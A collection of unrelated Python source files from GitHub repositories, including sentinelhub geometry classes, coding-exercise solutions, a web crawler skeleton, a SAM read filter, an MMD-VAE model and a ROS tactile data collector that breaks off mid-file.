Provide `(min_x, min_y, max_x, max_y)` or check documentation for other\"\n \" valid forms of input.\"\n )\n\n @staticmethod\n def _tuple_from_list_or_tuple(\n bbox: tuple[float, float, float, float] | tuple[tuple[float, float], tuple[float, float]]\n ) -> tuple[float, float, float, float]:\n \"\"\"Converts a list or tuple representation of a bbox into a flat tuple representation.\n\n :param bbox: a list or tuple with 4 coordinates that is either flat or nested\n :return: tuple (min_x, min_y, max_x, max_y)\n :raises: TypeError\n \"\"\"\n if len(bbox) == 4:\n min_x, min_y, max_x, max_y = bbox\n else:\n (min_x, min_y), (max_x, max_y) = bbox\n return float(min_x), float(min_y), float(max_x), float(max_y)\n\n @staticmethod\n def _tuple_from_str(bbox: str) -> tuple[float, float, float, float]:\n \"\"\"Parses a string of numbers separated by any combination of commas and spaces\n\n :param bbox: e.g. str of the form `min_x ,min_y max_x, max_y`\n :return: tuple (min_x,min_y,max_x,max_y)\n \"\"\"\n warnings.warn(\n \"Initializing `BBox` objects from strings will no longer be possible in future versions.\",\n category=SHDeprecationWarning,\n stacklevel=2,\n )\n string_parts = bbox.replace(\",\", \" \").split()\n if len(string_parts) != 4:\n raise ValueError(f\"Input {bbox} is not a valid string representation of a BBox.\")\n min_x, min_y, max_x, max_y = map(float, string_parts)\n return min_x, min_y, max_x, max_y\n\n @staticmethod\n def _tuple_from_dict(bbox: dict) -> tuple[float, float, float, float]:\n \"\"\"Converts a dictionary representation of a bbox into a flat tuple representation\n\n :param bbox: a dict with keys \"min_x, \"min_y\", \"max_x\", and \"max_y\"\n :return: tuple (min_x,min_y,max_x,max_y)\n :raises: KeyError\n \"\"\"\n return bbox[\"min_x\"], bbox[\"min_y\"], bbox[\"max_x\"], bbox[\"max_y\"]\n\n @staticmethod\n def _tuple_from_bbox(bbox: BBox) -> tuple[float, float, float, float]:\n \"\"\"Converts a BBox instance into a tuple\n\n :param bbox: An instance of the BBox type\n :return: tuple (min_x, min_y, max_x, max_y)\n \"\"\"\n warnings.warn(\n \"Initializing `BBox` objects from `BBox` objects will no longer be possible in future versions.\",\n category=SHDeprecationWarning,\n stacklevel=2,\n )\n return bbox.lower_left + bbox.upper_right\n\n def __iter__(self) -> Iterator[float]:\n \"\"\"This method enables iteration over coordinates of bounding box\"\"\"\n return iter(self.lower_left + self.upper_right)\n\n def __repr__(self) -> str:\n \"\"\"Class representation\"\"\"\n return f\"{self.__class__.__name__}(({self.lower_left}, {self.upper_right}), crs={self.crs!r})\"\n\n def __str__(self, reverse: bool = False) -> str:\n \"\"\"Transforms bounding box into a string of coordinates\n\n :param reverse: `True` if x and y coordinates should be switched and `False` otherwise\n :return: String of coordinates\n \"\"\"\n warnings.warn(\n \"The string representation of `BBox` will change to match its `repr` representation.\",\n category=SHDeprecationWarning,\n stacklevel=2,\n )\n if reverse:\n return f\"{self.min_y},{self.min_x},{self.max_y},{self.max_x}\"\n return f\"{self.min_x},{self.min_y},{self.max_x},{self.max_y}\"\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Method for comparing two bounding boxes\n\n :param other: Another bounding box object\n :return: `True` if bounding boxes have the same coordinates and the same CRS and `False otherwise\n \"\"\"\n if isinstance(other, BBox):\n return list(self) == list(other) and self.crs is other.crs\n return False\n\n @property\n def 
lower_left(self) -> tuple[float, float]:\n \"\"\"Returns the lower left vertex of the bounding box\n\n :return: min_x, min_y\n \"\"\"\n return self.min_x, self.min_y\n\n @property\n def upper_right(self) -> tuple[float, float]:\n \"\"\"Returns the upper right vertex of the bounding box\n\n :return: max_x, max_y\n \"\"\"\n return self.max_x, self.max_y\n\n @property\n def middle(self) -> tuple[float, float]:\n \"\"\"Returns the middle point of the bounding box\n\n :return: middle point\n \"\"\"\n return (self.min_x + self.max_x) / 2, (self.min_y + self.max_y) / 2\n\n def reverse(self) -> BBox:\n \"\"\"Returns a new BBox object where x and y coordinates are switched\n\n :return: New BBox object with switched coordinates\n \"\"\"\n return BBox((self.min_y, self.min_x, self.max_y, self.max_x), crs=self.crs)\n\n def transform(self, crs: CRS, always_xy: bool = True) -> BBox:\n \"\"\"Transforms BBox from current CRS to target CRS\n\n This transformation will take lower left and upper right corners of the bounding box, transform these 2 points\n and define a new bounding box with them. The resulting bounding box might not completely cover the original\n bounding box but at least the transformation is reversible.\n\n :param crs: target CRS\n :param always_xy: Parameter that is passed to `pyproj.Transformer` object and defines axis order for\n transformation. The default value `True` is in most cases the correct one.\n :return: Bounding box in target CRS\n \"\"\"\n new_crs = CRS(crs)\n return BBox(\n (\n transform_point(self.lower_left, self.crs, new_crs, always_xy=always_xy),\n transform_point(self.upper_right, self.crs, new_crs, always_xy=always_xy),\n ),\n crs=new_crs,\n )\n\n def transform_bounds(self, crs: CRS, always_xy: bool = True) -> BBox:\n \"\"\"Alternative way to transform BBox from current CRS to target CRS.\n\n This transformation will transform the bounding box geometry to another CRS as a geometric object, and then\n define a new bounding box from boundaries of that geometry. The resulting bounding box might be larger than\n original bounding box, but it will always completely cover it.\n\n :param crs: target CRS\n :param always_xy: Parameter that is passed to `pyproj.Transformer` object and defines axis order for\n transformation. The default value `True` is in most cases the correct one.\n :return: Bounding box in target CRS\n \"\"\"\n bbox_geometry = Geometry(self.geometry, self.crs)\n bbox_geometry = bbox_geometry.transform(crs, always_xy=always_xy)\n return bbox_geometry.bbox\n\n def apply(self, operation: Callable[[float, float], tuple[float, float]]) -> BBox:\n \"\"\"Applies a function to lower left and upper right pairs of coordinates of the bounding box to create a new\n bounding box.\"\"\"\n return BBox((operation(*self.lower_left), operation(*self.upper_right)), crs=self.crs)\n\n def buffer(self, buffer: float | tuple[float, float], *, relative: bool = True) -> BBox:\n \"\"\"Provides a new bounding box with a size that is changed either by a relative or an absolute buffer.\n\n :param buffer: The buffer can be provided either as a single number or a tuple of 2 numbers, one for buffer in\n horizontal direction and one for buffer in vertical direction. The buffer can also be negative as long as\n this doesn't reduce the bounding box into nothing.\n :param relative: If `True` the given buffer values will be interpreted as a percentage of distance between\n bounding box center point and its side edge (not to distance between opposite sides!). 
If `False` the given\n buffer will be interpreted as an absolute buffer measured in bounding box coordinate units.\n :return: A new bounding box of buffered size.\n \"\"\"\n if isinstance(buffer, tuple):\n buffer_x, buffer_y = buffer\n elif isinstance(buffer, (int, float)):\n buffer_x, buffer_y = buffer, buffer\n else:\n raise ValueError(f\"Buffer should be a number or a tuple of 2 numbers, got {type(buffer)}\")\n\n size_x, size_y = self.max_x - self.min_x, self.max_y - self.min_y\n\n if relative:\n buffer_x = buffer_x * size_x / 2\n buffer_y = buffer_y * size_y / 2\n\n for absolute_buffer, size, direction in [(buffer_x, size_x, \"horizontal\"), (buffer_y, size_y, \"vertical\")]:\n if 2 * absolute_buffer + size <= 0:\n raise ValueError(\n f\"Negative buffer is too large, cannot reduce the bounding box to nothing in {direction} direction\"\n )\n\n return BBox(\n (\n self.min_x - buffer_x,\n self.min_y - buffer_y,\n self.max_x + buffer_x,\n self.max_y + buffer_y,\n ),\n self.crs,\n )\n\n def get_polygon(self, reverse: bool = False) -> tuple[tuple[float, float], ...]:\n \"\"\"Returns a tuple of coordinates of 5 points describing a polygon. Points are listed in clockwise order, first\n point is the same as the last.\n\n :param reverse: `True` if x and y coordinates should be switched and `False` otherwise\n :return: `((x_1, y_1), ... , (x_5, y_5))`\n \"\"\"\n bbox = self.reverse() if reverse else self\n return (\n (bbox.min_x, bbox.min_y),\n (bbox.min_x, bbox.max_y),\n (bbox.max_x, bbox.max_y),\n (bbox.max_x, bbox.min_y),\n (bbox.min_x, bbox.min_y),\n )\n\n @property\n def geometry(self) -> shapely.geometry.Polygon:\n \"\"\"Returns polygon geometry in shapely format\n\n :return: A polygon in shapely format\n \"\"\"\n return shapely.geometry.Polygon(self.get_polygon())\n\n def get_partition(\n self,\n num_x: int | None = None,\n num_y: int | None = None,\n size_x: float | None = None,\n size_y: float | None = None,\n ) -> list[list[BBox]]:\n \"\"\"Partitions bounding box into smaller bounding boxes of the same size.\n\n If `num_x` and `num_y` are specified, the total number of BBoxes is know but not the size. If `size_x` and\n `size_y` are provided, the BBox size is fixed but the number of BBoxes is not known in advance. In the latter\n case, the generated bounding boxes might cover an area larger than the parent BBox.\n\n :param num_x: Number of parts BBox will be horizontally divided into.\n :param num_y: Number of parts BBox will be vertically divided into.\n :param size_x: Physical dimension of BBox along easting coordinate\n :param size_y: Physical dimension of BBox along northing coordinate\n :return: Two-dimensional list of smaller bounding boxes. Their location is\n \"\"\"\n if (num_x is not None and num_y is not None) and (size_x is None and size_y is None):\n size_x, size_y = (self.max_x - self.min_x) / num_x, (self.max_y - self.min_y) / num_y\n elif (size_x is not None and size_y is not None) and (num_x is None and num_y is None):\n num_x, num_y = ceil((self.max_x - self.min_x) / size_x), ceil((self.max_y - self.min_y) / size_y)\n else:\n raise ValueError(\"Not supported partition. 
Either (num_x, num_y) or (size_x, size_y) must be specified\")\n\n return [\n [\n BBox(\n (\n (self.min_x + i * size_x, self.min_y + j * size_y),\n (self.min_x + (i + 1) * size_x, self.min_y + (j + 1) * size_y),\n ),\n crs=self.crs,\n )\n for j in range(num_y)\n ]\n for i in range(num_x)\n ]\n\n def get_transform_vector(self, resx: float, resy: float) -> tuple[float, float, float, float, float, float]:\n \"\"\"Given resolution it returns a transformation vector\n\n :param resx: Resolution in x direction\n :param resy: Resolution in y direction\n :return: A tuple with 6 numbers representing transformation vector\n \"\"\"\n return self.min_x, self._parse_resolution(resx), 0, self.max_y, 0, -self._parse_resolution(resy)\n\n @staticmethod\n def _parse_resolution(res: str | int | float) -> float:\n \"\"\"Helper method for parsing given resolution. It will also try to parse a string into float\n\n :return: A float value of resolution\n \"\"\"\n if isinstance(res, str):\n return float(res.strip(\"m\"))\n if isinstance(res, (int, float)):\n return float(res)\n\n raise TypeError(f\"Resolution should be a float, got resolution of type {type(res)}\")\n\n\nclass Geometry(_BaseGeometry):\n \"\"\"A class that combines shapely geometry with coordinate reference system. It currently supports polygons and\n multipolygons.\n\n It can be initialized with any of the following geometry representations:\n - `shapely.geometry.Polygon` or `shapely.geometry.MultiPolygon`\n - A GeoJSON dictionary with (multi)polygon coordinates\n - A WKT string with (multi)polygon coordinates\n \"\"\"\n\n def __init__(self, geometry: Polygon | MultiPolygon | dict | str, crs: CRS):\n \"\"\"\n :param geometry: A polygon or multipolygon in any valid representation\n :param crs: Coordinate reference system of the geometry\n \"\"\"\n self._geometry = self._parse_geometry(geometry)\n\n super().__init__(crs)\n\n def __repr__(self) -> str:\n \"\"\"Method for class representation\"\"\"\n return f\"{self.__class__.__name__}({self.wkt}, crs={self.crs!r})\"\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Method for comparing two Geometry classes\n\n :param other: Another Geometry object\n :return: `True` if geometry objects have the same geometry and CRS and `False` otherwise\n \"\"\"\n if isinstance(other, Geometry):\n return self.geometry == other.geometry and self.crs is other.crs\n return False\n\n def reverse(self) -> Geometry:\n \"\"\"Returns a new Geometry object where x and y coordinates are switched\n\n :return: New Geometry object with switched coordinates\n \"\"\"\n return Geometry(shapely.ops.transform(lambda x, y: (y, x), self.geometry), crs=self.crs)\n\n def transform(self, crs: CRS, always_xy: bool = True) -> Geometry:\n \"\"\"Transforms Geometry from current CRS to target CRS\n\n :param crs: target CRS\n :param always_xy: Parameter that is passed to `pyproj.Transformer` object and defines axis order for\n transformation. 
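With `always_xy=True` coordinates are interpreted in (x, y) order regardless of the axis\n            order defined by the CRS. 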
The default value `True` is in most cases the correct one.\n :return: Geometry in target CRS\n \"\"\"\n new_crs = CRS(crs)\n\n geometry = self.geometry\n if new_crs is not self.crs:\n transform_function = self.crs.get_transform_function(new_crs, always_xy=always_xy)\n geometry = shapely.ops.transform(transform_function, geometry)\n\n return Geometry(geometry, crs=new_crs)\n\n def apply(self, operation: Callable[[float, float], tuple[float, float]]) -> Geometry:\n \"\"\"Applies a function to each pair of vertex coordinates of the geometry to create a new geometry.\"\"\"\n return Geometry(shapely.ops.transform(operation, self.geometry), crs=self.crs)\n\n @classmethod\n def from_geojson(cls, geojson: dict, crs: CRS | None = None) -> Geometry:\n \"\"\"Create Geometry object from geojson. It will parse crs from geojson (if info is available),\n otherwise it will be set to crs (WGS84 if parameter is empty)\n\n :param geojson: geojson geometry (single feature)\n :param crs: crs to be used if not available in geojson, CRS.WGS84 if not provided\n :return: Geometry object\n \"\"\"\n with contextlib.suppress(KeyError, AttributeError, TypeError):\n crs = CRS(geojson[\"crs\"][\"properties\"][\"name\"])\n\n if not crs:\n crs = CRS.WGS84\n\n return cls(geojson, crs=crs)\n\n @property\n def geometry(self) -> Polygon | MultiPolygon:\n \"\"\"Returns shapely object representing geometry in this class\n\n :return: A polygon or a multipolygon in shapely format\n \"\"\"\n return self._geometry\n\n @property\n def bbox(self) -> BBox:\n \"\"\"Returns BBox object representing bounding box around the geometry\n\n :return: A bounding box, with same CRS\n \"\"\"\n return BBox(self.geometry.bounds, self.crs)\n\n @staticmethod\n def _parse_geometry(geometry: Polygon | MultiPolygon | dict | str) -> Polygon | MultiPolygon:\n \"\"\"Parses given geometry into shapely object\n\n :param geometry: A representation of the geometry\n :return: Shapely polygon or multipolygon\n :raises TypeError\n \"\"\"\n if isinstance(geometry, str):\n geometry = shapely.wkt.loads(geometry)\n else:\n try:\n geometry = shapely.geometry.shape(geometry)\n except (GeometryTypeError, AttributeError) as exception:\n raise ValueError(f\"Unable to parse value {geometry} as a geometry.\") from exception\n\n if not isinstance(geometry, (Polygon, MultiPolygon)):\n raise ValueError(f\"Supported geometry types are polygon and multipolygon, got {type(geometry)}\")\n\n return geometry\n","repo_name":"sentinel-hub/sentinelhub-py","sub_path":"sentinelhub/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":23000,"program_lang":"python","lang":"en","doc_type":"code","stars":740,"dataset":"github-code","pt":"72"} +{"seq_id":"8551369246","text":"# https://leetcode.com/problems/valid-palindrome/\n\nclass Solution:\n def isPalindrome(self, s: str) -> bool:\n s = ''.join(char.lower() for char in s if char.isalnum())\n\n if len(s) <= 1:\n return True\n\n def validPalindrome(s, l, r):\n while l >= 0 and r < len(s) and s[l] == s[r]:\n l -= 1\n r += 1\n\n if l == -1 and r == len(s):\n return True\n else:\n return False\n\n if len(s) % 2 == 0:\n return validPalindrome(s, len(s) // 2 - 1 ,len(s) // 2)\n else:\n return validPalindrome(s, len(s) // 2, len(s) // 2)\n\n\ns = \"aa\"\n\nsol = Solution()\nprint(sol.isPalindrome(s))","repo_name":"jeffreytigerwang/Python-Practice","sub_path":"easy/Valid Palindrome.py","file_name":"Valid 
Palindrome.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30476900289","text":"from utils import get_logger\nfrom crawler.frontier import Frontier\nfrom crawler.worker import Worker\n\nclass Crawler(object):\n    def __init__(self, config, restart, wordFreq, wordCount, subDom, stopwords, frontier_factory=Frontier, worker_factory=Worker):\n        self.config = config\n        self.logger = get_logger(\"CRAWLER\")\n        self.frontier = frontier_factory(config, restart)\n        self.workers = list()\n        self.worker_factory = worker_factory\n        self.wordFreq = wordFreq\n        self.wordCount = wordCount\n        self.subDom = subDom\n        self.stopwords = stopwords\n\n    def start_async(self):\n        self.workers = [\n            self.worker_factory(worker_id, self.config, self.frontier, self.wordFreq, self.wordCount, self.subDom, self.stopwords)\n            for worker_id in range(self.config.threads_count)]\n        for worker in self.workers:\n            worker.start()\n\n    def start(self):\n        self.start_async()\n        self.join()\n\n    def join(self):\n        for worker in self.workers:\n            worker.join()\n","repo_name":"AndyJZhao24/Web-Crawler","sub_path":"crawler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18452801950","text":"def score(abc, xyz):\n    res = 0\n    if xyz == \"X\":\n        res = 1\n    elif xyz == \"Y\":\n        res = 2\n    elif xyz == \"Z\":\n        res = 3\n    if abc == \"A\" and xyz == \"X\" or abc == \"B\" and xyz == \"Y\" or abc == \"C\" and xyz == \"Z\":\n        res += 3\n    if abc == \"A\" and xyz == \"Y\" or abc == \"B\" and xyz == \"Z\" or abc == \"C\" and xyz == \"X\":\n        res += 6\n    return res\n\nans = 0\nwith open(\"in.txt\", \"r\") as f:\n    f = f.read().split(\"\\n\")\n    for ff in f:\n        ans += score(ff[0], ff[2])\nprint(ans)\n\n\n","repo_name":"ludvig-sandh/AdventOfCode22","sub_path":"Day 2/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27661974000","text":"ALPHABET = ('абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\n            'АБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ')\n\ndef encryption_caesar(msg, set_caesar):\n    encrypted_alphabet = ALPHABET[set_caesar:] + ALPHABET[:set_caesar]\n    encrypted = []\n    for char in msg:\n        index = get_char_index(char, ALPHABET)\n        encrypted_char = encrypted_alphabet[index] if index >= 0 else char\n        encrypted.append(encrypted_char)\n    return ''.join(encrypted)\n\ndef get_char_index(char, alphabet):\n    char_index = alphabet.find(char)\n    return char_index\n\ndef decryption_caesar(msg, offset=None):\n    encrypted_alphabet = ALPHABET[offset:] + ALPHABET[:offset]\n    decrypted = []\n    if not offset:\n        dictionary = ['Привет', 'пока', 'что']\n        for offset_1 in range(len(ALPHABET)):\n            encrypted_alphabet = ALPHABET[offset_1:] + ALPHABET[:offset_1]\n            for char in msg:\n                index = get_char_index(char, encrypted_alphabet)\n                encrypted_char = ALPHABET[index] if index >= 0 else char\n                decrypted.append(encrypted_char)\n            decrypted = ''.join(decrypted)\n            for word in dictionary:\n                if word in decrypted:\n                    return decrypted\n            decrypted = []\n    else:\n        for char in msg:\n            index = get_char_index(char, encrypted_alphabet)\n            encrypted_char = encrypted_alphabet[index - offset] \\\n                if index >= 0 else char\n            decrypted.append(encrypted_char)\n        return ''.join(decrypted)\n    return f'Failed to decrypt message {msg}'\n\nif __name__ == 
'__main__':\n    MESS = 'Привет! Мир'\n    ST = 5\n    ENCRYPTED_MESSAGE = encryption_caesar(MESS, ST)\n    print(f'Original message: {MESS}')\n    print(f'Encrypted message: {ENCRYPTED_MESSAGE}')\n    print(f'Decrypted message: {decryption_caesar(ENCRYPTED_MESSAGE)}')\n","repo_name":"eugene-okulik/QAP-08onl","sub_path":"homework/wolk/wolk_sergey_homework_7/hwork_1.py","file_name":"hwork_1.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70127236714","text":"import sys\nimport common\nimport argparse\n\n\"\"\"\nScript that takes a SAM file as input and outputs a SAM file containing\nonly multimapped reads in order for them to be filtered, stored in a file or\npiped to another process\n\nauthor : Luqman FERDJANI\n\"\"\"\n\n\"\"\"\nThis function counts occurrences of reads in a SAM file and returns a set\ncontaining the IDs of the multimapped sequences\n\n:param IOstream: IO stream of SAM file\n:return: set of multimapped reads IDs\n\"\"\"\ndef extractMultiMappings(IOstream):\n    IOstream.seek(0)\n    multimappedReads = set()\n    occurrences = dict()\n    #We start by skipping the @ lines\n    line = common.skipAts(IOstream)\n    while line!='':\n        readID = line.split()[0]\n        if readID in occurrences:\n            if occurrences[readID]==1:\n                multimappedReads.add(readID)\n            occurrences[readID]+=1\n        else:\n            occurrences[readID]=1\n        line = IOstream.readline()\n    return multimappedReads\n\n\"\"\"\nThis function takes a set containing the IDs of multimapped reads and a SAM file\nand outputs on stdout only the SAM file lines about the aforementioned reads\n\n:param multimappedReadsSet: set containing the IDs of multimappedReads\n:param IOstream: IO stream of SAM file\n\"\"\"\ndef outputMultimappedReads(IOstream,multimappedReadsSet):\n    IOstream.seek(0)\n    line = common.outputHeader(IOstream)\n    while line!='':\n        readID = line.split()[0]\n        if readID in multimappedReadsSet:\n            sys.stdout.write(line)\n        line = IOstream.readline()\n\n\nif __name__=='__main__':\n\n    parser = argparse.ArgumentParser(description=\"Takes a SAM file and outputs only the multimapped reads on stdout while keeping the SAM format\")\n\n    parser.add_argument(\"sam_files\", help=\"The sam file to be filtered by this script\")\n\n    args = parser.parse_args()\n\n\n    samFile = open(args.sam_files,'r')\n    multimappedReadsSet = extractMultiMappings(samFile)\n    outputMultimappedReads(samFile,multimappedReadsSet)\n    samFile.close()\n","repo_name":"leonhart8/multimappings_study","sub_path":"multimapsfilter.py","file_name":"multimapsfilter.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41305836822","text":"# Alice is going to the mad tea party, to see her friends. 
On the way to the party,\n# she needs to collect bags of tea.\n# You will be given an integer n for the size of the Wonderland territory with a square shape.\n# On the following n lines, you will receive the rows of the territory:\n# • Alice will be placed in a random position, marked with the letter \"A\".\n# • On the territory, there will be bags of tea, represented as numbers.\n\n# If Alice steps on a number position, she collects the tea bags and increases the quantity\n# with the corresponding number.\n# • There will always be one rabbit hole on the territory marked with the letter \"R\".\n# • All of the empty positions will be marked with \".\".\n# After the field state, you will be given commands for Alice's movements.\n# Move commands can be: \"up\", \"down\", \"left\" or \"right\".\n# When Alice collects at least 10 bags of tea, she is ready to go to the tea party,\n# and she does not need to continue collecting.\n# Otherwise, if she steps on the rabbit hole or goes out of the territory, she can't return,\n# and the program ends.\n# In the end, the path she walked had to be marked with '*'.\n\nn = int(input())\nM = [[int(m) if m.isnumeric() else str(m) for m in input().split()] for _ in range(n)]\nA = (0, 0)\ndirections = {\n 'up': lambda r, c: (r - 1, c),\n 'down': lambda r, c: (r + 1, c),\n 'left': lambda r, c: (r, c - 1),\n 'right': lambda r, c: (r, c + 1),\n}\ntea_bags = 0\nRabbit_hole = False\nfor row in range(n):\n for col in range(n):\n if M[row][col] == 'A':\n A = (row, col)\n M[row][col] = '*'\n\n while tea_bags < 10 and not Rabbit_hole:\n command = input()\n step_r, step_c = directions[command](A[0], A[1]) # Passing Alice position to the lambda func\n if 0 <= step_r <= n - 1 and 0 <= step_c <= n - 1: # Check new position is valid\n A = (step_r, step_c)\n if M[step_r][step_c] == 'R':\n M[step_r][step_c] = '*'\n Rabbit_hole = True\n elif M[step_r][step_c] == '.':\n M[step_r][step_c] = '*'\n elif M[step_r][step_c] == '*':\n continue\n else:\n tea_bags += M[step_r][step_c] # found tea bags\n M[step_r][step_c] = '*'\n else:\n break\n\nif tea_bags >= 10 and not Rabbit_hole:\n print(\"She did it! 
She went to the party.\")\n [print(*m) for m in M]\nelse:\n print(\"Alice didn't make it to the tea party.\")\n [print(*m) for m in M]\n","repo_name":"h-dmt/Python_Advanced","sub_path":"4_multidimensional_lists/alice_in_wonderland.py","file_name":"alice_in_wonderland.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11570173416","text":"import urllib.request\n\nprint('Beginning file update...')\n \nurllib.request.urlretrieve (\"https://github.com/xXxHotShotxXx/test/archive/master.zip\",\"update.zip\")\n\nprint('Update complete')\nimport zipfile\nprint('Beginning unzip update...')\nzip_ref = zipfile.ZipFile(\"update.zip\", 'r')\nzip_ref.extractall(\"\")\nzip_ref.close()\nprint(\"unzip complete\")\n","repo_name":"xXxHotShotxXx/test","sub_path":"update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26192308635","text":"import torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torch.nn import functional as F\nfrom torchvision import datasets, transforms\nimport numpy as np\n\n\"\"\"\nMMD Objective using Gaussian Kernel.\nThe repo is from https://github.com/Saswatm123/MMD-VAE/blob/master/MMD_VAE.ipynb\n\"\"\"\ndef gaussian_kernel(a, b):\n dim1_1, dim1_2 = a.shape[0], b.shape[0]\n depth = a.shape[1]#depth = LATENT_SIZE\n a = a.view(dim1_1, 1, depth)\n b = b.view(1, dim1_2, depth)\n a_core = a.expand(dim1_1, dim1_2, depth)\n b_core = b.expand(dim1_1, dim1_2, depth)\n numerator = (a_core - b_core).pow(2).mean(2)/depth\n return torch.exp(-numerator)\n\ndef MMD(a, b):\n return gaussian_kernel(a, a).mean() + gaussian_kernel(b, b).mean() - 2*gaussian_kernel(a, b).mean()\n\n\nclass Reshape(nn.Module):\n def __init__(self, *target_shape):\n super().__init__()\n self.target_shape = target_shape\n def forward(self, x):\n return x.view(*self.target_shape)\n\nclass MMD_VAE(nn.Module):\n def __init__(self,LATENT_SIZE):\n super().__init__()\n self.encoder = nn.Sequential(\n nn.Conv2d(in_channels = 1, out_channels = 5, kernel_size = 5, padding = 2),\n nn.LeakyReLU(),\n nn.Conv2d(in_channels = 5, out_channels = 5, kernel_size = 5),\n nn.LeakyReLU(),\n nn.Conv2d(in_channels = 5, out_channels = 5, kernel_size = 5),\n nn.LeakyReLU(),\n Reshape([-1,5*20*20]),\n nn.Linear(in_features = 5*20*20, out_features = 5*12),\n nn.LeakyReLU(),\n nn.Linear(in_features = 5*12, out_features = LATENT_SIZE)\n )\n self.decoder = nn.Sequential(\n nn.Linear(in_features = LATENT_SIZE, out_features = 5*12),\n nn.ReLU(),\n nn.Linear(in_features = 5*12, out_features = 24*24),\n nn.ReLU(),\n Reshape([-1,1,24,24]),\n nn.ConvTranspose2d(in_channels = 1, out_channels = 5, kernel_size = 3),\n nn.ReLU(),\n nn.ConvTranspose2d(in_channels = 5, out_channels = 10, kernel_size = 5),\n nn.ReLU(),\n nn.Conv2d(in_channels = 10, out_channels = 1, kernel_size = 3),\n nn.Sigmoid()\n )\n \n def forward(self, X):\n if self.training:\n latent = self.encoder(X)\n return self.decoder(latent), latent\n else:\n return self.decoder( self.encoder(X) )\n\n\nif __name__ == \"__main__\":\n DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n SEED, BATCH_SIZE, LATENT_SIZE = 123, 128, 4\n torch.manual_seed(SEED)\n # DATA I/O\n train = datasets.MNIST('mnist',train=True,transform=transforms.ToTensor(),download=True)\n train = train.data.float().to(DEVICE)/256# Converting from integer to float\n 
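# NOTE: dividing by 256 rather than 255 keeps pixel intensities strictly below 1.0.\n    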
train_loader = DataLoader(dataset = train,batch_size = BATCH_SIZE,shuffle = True)\n # MODEL\n net = MMD_VAE(LATENT_SIZE).to(DEVICE)\n optimizer = optim.Adam(net.parameters(),lr=1e-4)\n net.train()\n for batchnum, X in enumerate(train_loader):\n optimizer.zero_grad()\n X = X.reshape(-1, 1, 28, 28)\n print(\"X.shape: \",X.shape)#torch.Size([96, 1, 28, 28])\n _, mu = net(X)\n print(\"mu.shape: \",mu.shape)#torch.Size([96, 4])\n mmd = MMD(torch.randn(96,LATENT_SIZE,requires_grad=False).to(DEVICE), mu)\n mmd.backward()\n optimizer.step()\n print(\"mmd loss: \",mmd.item())\n\n\n\n\n\n","repo_name":"ivclab/CVS","sub_path":"mmdloss.py","file_name":"mmdloss.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"6963648037","text":"import os\nimport time\nimport rospy\nimport pickle\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom cv_bridge import CvBridge\nfrom sensor_msgs.msg import Image, JointState\nfrom tactile_msgs.msg import TactileState\nfrom geometry_msgs.msg import WrenchStamped\n\nfrom tf import TransformListener\nfrom datetime import datetime\nfrom learn_placing import dataset_path, datefmt\nfrom learn_placing.common import v2l, line_angle_from_rotation, models_theta_plot, preprocess_myrmex\n\n\nclass DataCollector:\n world_frame = \"base_footprint\"\n grasping_frame = \"gripper_grasping_frame\"\n left_finger_name = \"gripper_left_finger_joint\"\n right_finger_name = \"gripper_right_finger_joint\"\n object_frame = \"object\"\n mm_left, mm_right, ft, js = None, None, None, None # message data variables\n gr_idx, gl_idx = None, None # JointState indices for left and right finger joint values\n\n def __init__(self, save_path):\n self.count = 1\n self.save_path = save_path\n self.pics_path = f\"{self.save_path}/pics/\"\n\n os.makedirs(self.save_path, exist_ok=True)\n os.makedirs(self.pics_path, exist_ok=True)\n\n self.ftsub = rospy.Subscriber(\"/wrist_ft\", WrenchStamped, callback=self.ft_cb)\n self.tlsub = rospy.Subscriber(\"/tactile_left\", TactileState, callback=self.tl_cb)\n self.trsub = rospy.Subscriber(\"/tactile_right\", TactileState, callback=self.tr_cb)\n self.jssub = rospy.Subscriber(\"/joint_states\", JointState, callback=self.js_cb)\n\n self.bridge = CvBridge()\n self.imgpub = rospy.Publisher(\"/collector_image\", Image, queue_size=1)\n\n self.li = TransformListener()\n self.li.waitForTransform(self.world_frame, self.grasping_frame, rospy.Time(0), rospy.Duration(5))\n \n def tl_cb(self, m): self.mm_left = preprocess_myrmex(m.sensors[0].values)\n def tr_cb(self, m): self.mm_right = preprocess_myrmex(m.sensors[0].values)\n def ft_cb(self, m): self.ft = np.concatenate([v2l(m.wrench.force), v2l(m.wrench.torque)])\n def js_cb(self, m): self.js = {self.right_finger_name: m.position[m.name.index(self.right_finger_name)], self.left_finger_name: m.position[m.name.index(self.left_finger_name)]}\n\n\n def reset_data(self):\n self.mm_left, self.mm_right, self.ft, self.js = None, None, None, None\n\n def collect(self):\n print(f\"collecting sample {self.count}\")\n while np.any(self.mm_left == None) or np.any(self.mm_right == None) or np.any(self.ft == None) or self.js is None:\n print(\"waiting for data ...\")\n rospy.Rate(2).sleep()\n\n # get gripper and object orientations\n (_, Qwg) = self.li.lookupTransform(self.world_frame, 